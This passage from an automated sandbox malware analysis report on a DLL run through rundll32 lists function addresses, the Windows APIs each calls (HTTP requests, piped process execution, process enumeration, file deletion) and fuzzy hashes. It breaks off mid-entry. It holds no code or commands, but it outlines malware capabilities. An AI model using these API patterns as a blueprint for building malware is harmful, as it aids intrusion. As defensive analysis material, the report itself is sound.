Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8381a955bc61871f0359c33ee3e291de89bd3433656366222b7e30a7a9f8691b
Instruction ID: ee9b451b5cf86ab863982d541c48258ebac645a06e4aefb677b71d98cbdadc8b
Opcode Fuzzy Hash: 8381a955bc61871f0359c33ee3e291de89bd3433656366222b7e30a7a9f8691b
Instruction Fuzzy Hash: 397133F150CE86C5E750DB24E4883FAA3A2FB843A4F601136E68D47AA9DF7CD545CB40

Function 00007FFB1C814F58 Relevance: 1.6, APIs: 1, Instructions: 53filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET ref: 00007FFB1C814FB9

Memory Dump Source

Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true

Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd

Yara matches

Similarity

API ID: FileInternetRead
String ID:
API String ID: 778332206-0
Opcode ID: a68542daa31667be7df08955cda83d3b91bfe5c76f250ac66b7e363db0ead897
Instruction ID: 62d05b9f7d27c187ada764dbc54dce264c713d8a7be7767b61ed5fd37d282cbf
Opcode Fuzzy Hash: a68542daa31667be7df08955cda83d3b91bfe5c76f250ac66b7e363db0ead897
Instruction Fuzzy Hash: 752142B66289818BD761CA25E4547FAA3D2F7C8784F505134EA8D83B98EF3DD545CF00

Function 00007FFB1C8188F8 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

RtlFormatCurrentUserKeyPath.NTDLL ref: 00007FFB1C81896F

Part of subcall function 00007FFB1C817B40: NtFreeVirtualMemory.NTDLL ref: 00007FFB1C817B71

Memory Dump Source

Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true

Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd

Yara matches

Similarity

API ID: CurrentFormatFreeMemoryPathUserVirtual
String ID:
API String ID: 2593304397-0
Opcode ID: 9f1dc64e2660647f48657db305d7ecd1854051da390ce74a7bee0b97b00f7db3
Instruction ID: 0a20585a4ca7038dd7025ea05551bb1f98d6c3a18ff42b38bc5afd3610090741
Opcode Fuzzy Hash: 9f1dc64e2660647f48657db305d7ecd1854051da390ce74a7bee0b97b00f7db3
Instruction Fuzzy Hash: 0B2135E2A2CD43D9EA609B30E4C93FA63E2FB84394F602535E6CE41599DF2CE5048701

Function 00007FFB1C81841C Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFB1C81AD34: NtAllocateVirtualMemory.NTDLL ref: 00007FFB1C81AD6A

GetModuleFileNameW.KERNEL32 ref: 00007FFB1C818462

Part of subcall function 00007FFB1C817B40: NtFreeVirtualMemory.NTDLL ref: 00007FFB1C817B71

Memory Dump Source

Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true

Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd

Yara matches

Similarity

API ID: MemoryVirtual$AllocateFileFreeModuleName
String ID:
API String ID: 1369786923-0
Opcode ID: 07f92dfef09a587dddc401c1254499f12169b726f2b64713fbf301a2a07a4dad
Instruction ID: 2aa20b1e27fb10e2aaa75916a251d0344e78bb0c57a94203603944eee7155d34
Opcode Fuzzy Hash: 07f92dfef09a587dddc401c1254499f12169b726f2b64713fbf301a2a07a4dad
Instruction Fuzzy Hash: 3B21B5F2528A81CBD670DB15E0893AAB7E1F788798F102125E68D42A98CF7CD544CF04

Function 00007FFB1C813194 Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

wsprintfW.USER32 ref: 00007FFB1C813224

Memory Dump Source

Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true

Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd

Yara matches

Similarity

API ID: wsprintf
String ID:
API String ID: 2111968516-0
Opcode ID: 09100f0300395ae6f5b584f03befab42788e05347f36807b9dbcae9cb551cf0d
Instruction ID: 5697c4cb9d1f96907e02973aae41dfaba72db0cd3571a537d27a9bce32842d8c
Opcode Fuzzy Hash: 09100f0300395ae6f5b584f03befab42788e05347f36807b9dbcae9cb551cf0d
Instruction Fuzzy Hash: 671121B262CA81DAD761DB20E4843BAB3E1FBC8754F605135E68D42AA8DF3CD645CF40

Function 00007FFB1C8152AE Relevance: 1.5, APIs: 1, Instructions: 38networkCOMMON

Download Yara Rule

APIs

HttpOpenRequestA.WININET ref: 00007FFB1C815168

Memory Dump Source

Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true

Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd

Yara matches

Similarity

API ID: HttpOpenRequest
String ID:
API String ID: 1984915467-0
Opcode ID: d3bbcf092bf317b69aa5920fd26c720e35799b4d4559b083c20404fb49592572
Instruction ID: 5cb7c3cc7c72a62d3d33cef884e7858d5350ad1271b9437168709dd0a7b4c804
Opcode Fuzzy Hash: d3bbcf092bf317b69aa5920fd26c720e35799b4d4559b083c20404fb49592572
Instruction Fuzzy Hash: 9D112EB250DB82C9E7A18B20E4983FA77E1F785364F741435D68D82A58DF3DD544CB00

Function 00007FFB1C818A94 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32 ref: 00007FFB1C818AB4

Memory Dump Source

Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true

Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd

Yara matches

Similarity

API ID: DirectorySystem
String ID:
API String ID: 2188284642-0
Opcode ID: dfb4a1fa39bbd87ebdbe77a0f586fcf263206d1ff544b9d7c1b54ce86c222524
Instruction ID: ef1441ed88f3e41a9afe15f2a90bae5b91c0b3e622a51e163684984b28128d45
Opcode Fuzzy Hash: dfb4a1fa39bbd87ebdbe77a0f586fcf263206d1ff544b9d7c1b54ce86c222524
Instruction Fuzzy Hash: F8E0EDD2A18982D6EA60A630D4893FA62E2BB90314FE05231A19DC69E5DE2CDA16C740

Function 00007FFB1C816250 Relevance: 1.5, APIs: 1, Instructions: 17threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32 ref: 00007FFB1C816274

Memory Dump Source

Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true

Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: c45bf1b7016e12f55803173f5a134f8e4d9140d986f13323f797921f0d003010
Instruction ID: 3f20f6867bef3f504fbfaaffc3a638a42d43881d0efacf4051dfcfcd1e99fb3f
Opcode Fuzzy Hash: c45bf1b7016e12f55803173f5a134f8e4d9140d986f13323f797921f0d003010
Instruction Fuzzy Hash: 38E0EDF2928B41C5D3A49B20E4893AA67E2F784368F602439E58E42B68CF3CD155CA00

Function 00007FFB1C816298 Relevance: 1.3, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFB1C81AD34: NtAllocateVirtualMemory.NTDLL ref: 00007FFB1C81AD6A

MultiByteToWideChar.KERNEL32 ref: 00007FFB1C816317

Memory Dump Source

Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true

Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateByteCharMemoryMultiVirtualWide
String ID:
API String ID: 2538853753-0
Opcode ID: bdff32931c568aa2b41cae0d8167a9a3209d769e680741c51a3239078880a574
Instruction ID: 7058de807307744b775d107d8aa79a5e7252e2ce70f4d2008cae2c872269d0f7
Opcode Fuzzy Hash: bdff32931c568aa2b41cae0d8167a9a3209d769e680741c51a3239078880a574
Instruction Fuzzy Hash: 5501C0B6628A85CAD790DB24E4857AEBBE1F788754F106035FA8B83B54DE3CD5458B00

Non-executed Functions

Function 00007FFB1C811030 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 206pipefileprocessCOMMON

Download Yara Rule

APIs

CreatePipe.KERNEL32 ref: 00007FFB1C8110FF
SetHandleInformation.KERNEL32 ref: 00007FFB1C811119
CreatePipe.KERNEL32 ref: 00007FFB1C81113A
SetHandleInformation.KERNEL32 ref: 00007FFB1C811154
CreatePipe.KERNEL32 ref: 00007FFB1C811175
SetHandleInformation.KERNEL32 ref: 00007FFB1C81118F
CreateProcessW.KERNEL32 ref: 00007FFB1C811251

Part of subcall function 00007FFB1C81AD34: NtAllocateVirtualMemory.NTDLL ref: 00007FFB1C81AD6A

PeekNamedPipe.KERNEL32 ref: 00007FFB1C811300
ReadFile.KERNEL32 ref: 00007FFB1C81135C
PeekNamedPipe.KERNEL32 ref: 00007FFB1C8113B0
ReadFile.KERNEL32 ref: 00007FFB1C81140C
GetExitCodeProcess.KERNEL32 ref: 00007FFB1C811445
TerminateProcess.KERNEL32 ref: 00007FFB1C811476
CloseHandle.KERNEL32 ref: 00007FFB1C811484

Part of subcall function 00007FFB1C81C934: NtDelayExecution.NTDLL ref: 00007FFB1C81C956

CloseHandle.KERNEL32 ref: 00007FFB1C811492
CloseHandle.KERNEL32 ref: 00007FFB1C8114A0
CloseHandle.KERNEL32 ref: 00007FFB1C8114AE

Part of subcall function 00007FFB1C817B40: NtFreeVirtualMemory.NTDLL ref: 00007FFB1C817B71

Strings

h, xrefs: 00007FFB1C811195

Memory Dump Source

Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true

Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd

Yara matches

Similarity

API ID: Handle$Pipe$CloseCreate$InformationProcess$FileMemoryNamedPeekReadVirtual$AllocateCodeDelayExecutionExitFreeTerminate
String ID: h
API String ID: 30365702-2439710439
Opcode ID: c7ea92724c3334c97a9971424b4cca70876af855f6483493e30f8d1e3fdc11da
Instruction ID: e16abf71577ed44fa8e8a7115dee1e9a57167d3849fb8ea48b35087b1b200b7a
Opcode Fuzzy Hash: c7ea92724c3334c97a9971424b4cca70876af855f6483493e30f8d1e3fdc11da
Instruction Fuzzy Hash: E7C1D1B6608BC18AE760CF65E4983AAB7A2F7C4754F505125EA8D83E68CF7CD449CF40

Function 00007FFB1C81745C Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 31nativefileCOMMON

Download Yara Rule

APIs

RtlInitUnicodeString.NTDLL ref: 00007FFB1C8174A2
NtOpenFile.NTDLL ref: 00007FFB1C8174D6
NtClose.NTDLL ref: 00007FFB1C8174F0

Strings

@, xrefs: 00007FFB1C817482
0, xrefs: 00007FFB1C81748D
, xrefs: 00007FFB1C8174B2

Memory Dump Source

Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true

Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseFileInitOpenStringUnicode
String ID: $0$@
API String ID: 3719522541-2347541974
Opcode ID: 569bf1d9c0e4b42045824f196861e1bccdac350dc9b2e721c941129060653f3b
Instruction ID: dd6b6564e4e0780194e7c887d88dc62cd5b759fa0c73ffbcc2fa829ece055e02
Opcode Fuzzy Hash: 569bf1d9c0e4b42045824f196861e1bccdac350dc9b2e721c941129060653f3b
Instruction Fuzzy Hash: B10192B1518A41D6E750DF20E4983EBB7A1F7C4754FA01035E68E42A68DF7DD589CB40

Function 00007FFB1C817588 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43nativefileCOMMON

Download Yara Rule

APIs

RtlInitUnicodeString.NTDLL ref: 00007FFB1C8175E3

Part of subcall function 00007FFB1C817414: GetFileAttributesW.KERNEL32 ref: 00007FFB1C817428

NtCreateFile.NTDLL ref: 00007FFB1C817662
NtClose.NTDLL ref: 00007FFB1C817680

Strings

0, xrefs: 00007FFB1C8175CB
@, xrefs: 00007FFB1C8175C0

Memory Dump Source

Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true

Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd

Yara matches

Similarity

API ID: File$AttributesCloseCreateInitStringUnicode
String ID: 0$@
API String ID: 2504508917-1545510068
Opcode ID: 76083a2609edba1498485c59019560715fe1d99402632d84a6ddf28b8a5ccd31
Instruction ID: 4e770b361f841b3e0bf8f54851e483a0c5d4ee32cda18a154c3ca4410fa4046f
Opcode Fuzzy Hash: 76083a2609edba1498485c59019560715fe1d99402632d84a6ddf28b8a5ccd31
Instruction Fuzzy Hash: A321C8B2518B81CAE7609F20E4983EBB7A1F7C0358F604135E68946AA9DF7DD949CF40

Function 00007FFB1C817694 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21filenativeCOMMON

Download Yara Rule

APIs

RtlInitUnicodeString.NTDLL ref: 00007FFB1C8176D1
NtDeleteFile.NTDLL ref: 00007FFB1C8176E6

Strings

0, xrefs: 00007FFB1C8176BC
@, xrefs: 00007FFB1C8176B4

Memory Dump Source

Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true

Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd

Yara matches

Similarity

API ID: DeleteFileInitStringUnicode
String ID: 0$@
API String ID: 3559453722-1545510068
Opcode ID: b6164af5c4588a1862d81e9109c65e2a6067d28343454251f55d6c9ee728859c
Instruction ID: 2d21d8fe8cb0d931de378297b8743f97492188767f7eb940b61c252153aa840f
Opcode Fuzzy Hash: b6164af5c4588a1862d81e9109c65e2a6067d28343454251f55d6c9ee728859c
Instruction Fuzzy Hash: 4AF012B251898186D7209F10E49839FB7A5F780398FA00135E28E46A68CB7CD559CF00

Function 00007FFB1C811A08 Relevance: 6.1, APIs: 4, Instructions: 113fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FFB1C81AD34: NtAllocateVirtualMemory.NTDLL ref: 00007FFB1C81AD6A

FindFirstFileA.KERNEL32 ref: 00007FFB1C811AC7
wsprintfA.USER32 ref: 00007FFB1C811B95
FindNextFileA.KERNEL32 ref: 00007FFB1C811BC2
FindClose.KERNEL32 ref: 00007FFB1C811BD5

Memory Dump Source

Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true

Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd

Yara matches

Similarity

API ID: Find$File$AllocateCloseFirstMemoryNextVirtualwsprintf
String ID:
API String ID: 65906682-0
Opcode ID: 1418cde18ef981d85429d69ba626c9c5e0dc3944bf2fa7209e1b4b16b78b162b
Instruction ID: e9e86e0ae97fe175b14a43609a25645636f55944ce1a65617dacedaee1cc43b7
Opcode Fuzzy Hash: 1418cde18ef981d85429d69ba626c9c5e0dc3944bf2fa7209e1b4b16b78b162b
Instruction Fuzzy Hash: FB5131F251DE86D5DA50DB20E4C83FAA3E2FB843A4F601135E68D42AA8EF7CE545C700

Function 00007FFB1C811C38 Relevance: 15.2, APIs: 10, Instructions: 234processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00007FFB1C811C72

Part of subcall function 00007FFB1C81AD34: NtAllocateVirtualMemory.NTDLL ref: 00007FFB1C81AD6A

Process32First.KERNEL32 ref: 00007FFB1C811CFC
Process32Next.KERNEL32 ref: 00007FFB1C811D1D
Process32First.KERNEL32 ref: 00007FFB1C811D49
Process32Next.KERNEL32 ref: 00007FFB1C811D96
Process32First.KERNEL32 ref: 00007FFB1C811DAD
wsprintfA.USER32 ref: 00007FFB1C811EF0
wsprintfA.USER32 ref: 00007FFB1C811F96
Process32Next.KERNEL32 ref: 00007FFB1C8120D3
CloseHandle.KERNEL32 ref: 00007FFB1C8120F0

Memory Dump Source

Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true

Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd

Yara matches

Similarity

API ID: Process32$FirstNext$wsprintf$AllocateCloseCreateHandleMemorySnapshotToolhelp32Virtual
String ID:
API String ID: 3605396869-0
Opcode ID: 1cf766020566e6443c6bce46fc44fb3495e7a6d99ba00991271e77096b33a8ce
Instruction ID: c69d654954a6b4450dbeba05b2f838c14011dd16f60df44f178a012c78adb61f
Opcode Fuzzy Hash: 1cf766020566e6443c6bce46fc44fb3495e7a6d99ba00991271e77096b33a8ce
Instruction Fuzzy Hash: 53D1FCF261CE86D9DA70DB24E4943FAB3A2FB84394F901135D68D42AA9EF3CD545CB40

Function 00007FFB1C814110 Relevance: 12.2, APIs: 8, Instructions: 237COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFB1C81AD34: NtAllocateVirtualMemory.NTDLL ref: 00007FFB1C81AD6A

Part of subcall function 00007FFB1C817E90: SHGetFolderPathW.SHELL32 ref: 00007FFB1C817EC3

wsprintfW.USER32 ref: 00007FFB1C81424D
wsprintfW.USER32 ref: 00007FFB1C8142A8
wsprintfW.USER32 ref: 00007FFB1C8143C3

Memory Dump Source

Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true

Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd

Yara matches

Similarity

API ID: wsprintf$AllocateFolderMemoryPathVirtual
String ID:
API String ID: 206084008-0
Opcode ID: eb9421ec7a332903955aa93ad15a3c844f820e63e61f444feda6d35b431bc8ad
Instruction ID: 3d37752e01af937eb33b6848f463439dd1765a9c5025327474123589c6333699
Opcode Fuzzy Hash: eb9421ec7a332903955aa93ad15a3c844f820e63e61f444feda6d35b431bc8ad
Instruction Fuzzy Hash: C5D1C9B2619EC2D5EA60DB24E4853FAB3A2FBC4350F601036D68D82A99DF7CD545CB40

Function 00007FFB1C81B670 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

CreateFileMappingA.KERNEL32 ref: 00007FFB1C81B6DE
MapViewOfFile.KERNEL32 ref: 00007FFB1C81B711
VirtualFree.KERNEL32 ref: 00007FFB1C81B815
UnmapViewOfFile.KERNEL32 ref: 00007FFB1C81B82D
CloseHandle.KERNEL32 ref: 00007FFB1C81B838

Strings

@, xrefs: 00007FFB1C81B6F8

Memory Dump Source

Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true

Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd

Yara matches

Similarity

API ID: File$View$CloseCreateFreeHandleMappingUnmapVirtual
String ID: @
API String ID: 1610889594-2766056989
Opcode ID: bcde029e8d15cc8f6f1f6978aa9a1a3352948a0736e2faf6ca77c6a614fab714
Instruction ID: 35704c0989db5edac5bce2e541f8797b5f2e97b9ea3f588efa2efdc405ac4f1b
Opcode Fuzzy Hash: bcde029e8d15cc8f6f1f6978aa9a1a3352948a0736e2faf6ca77c6a614fab714
Instruction Fuzzy Hash: 3551EFF6619E86C5EB509B25E4943BAA3A2FBC47A0F601135EA8E43FA5DF3CD445C700

Function 00007FFB1C8133AC Relevance: 9.2, APIs: 6, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true

Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
